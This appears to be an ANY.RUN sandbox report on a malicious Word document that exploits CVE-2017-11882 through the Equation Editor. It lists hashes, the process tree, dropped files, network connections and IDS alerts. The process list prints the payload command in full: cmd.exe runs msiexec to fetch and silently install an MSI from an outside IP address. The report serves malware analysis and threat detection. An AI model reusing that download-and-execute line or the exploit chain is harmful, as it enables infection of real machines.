analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOC_ORDER25437.doc

Full analysis: https://app.any.run/tasks/f82536ff-385d-411e-b87d-aac4a6af1047
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 09:20:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

46203C71F96CF234D3A338D9DB15032A

SHA1:

3DD0FE53B7F1ADE6765DF8DA45B8B7C2AE6ED41B

SHA256:

1A711629A0CC2EC3E9C14D9500FF7CAB1114474C98EB0D9392E269F50AEA8513

SSDEEP:

768:QmKfcZpEHUqUisx+NLBxgemYveKJVnajvOc1bmjq/qhzfwq8dDsQACBnjK/:Q4ZcUisxYt4IiQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 572)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1000)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 1000)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 920)
    • Application was crashed

      • EQNEDT32.EXE (PID: 1000)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC_ORDER25437.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1000"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
572cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1619
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1700msiexec.exe /i http://34.244.180.39/oo.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3448C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
1 222
Read events
846
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA709.tmp.cvr
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9BF9BF42-4831-468B-9FDE-93A761D5B95B}.tmp
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C_ORDER25437.docpgc
MD5:4D02573580324901929966425969D7FA
SHA256:005DB042218BB028DE0677F848A1EFFB2AF353E7497529BDA2EB2EB976BD9306
920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:256A3EF47ED32A3D3038855D49DF0319
SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0
920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{80B09B43-A7D0-4DA2-B8FA-D2A5BC30E16C}.tmpbinary
MD5:031924D098057980CF56E04D1550B935
SHA256:B6223BC0AD33E8F680A4C19959326E502C410032296CB5BE270B9CF61EF563D7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3448
msiexec.exe
GET
34.244.180.39:80
http://34.244.180.39/oo.msi
IE
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3448
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3448
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3448
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3448
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3448
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
1 ETPRO signatures available at the full report
No debug info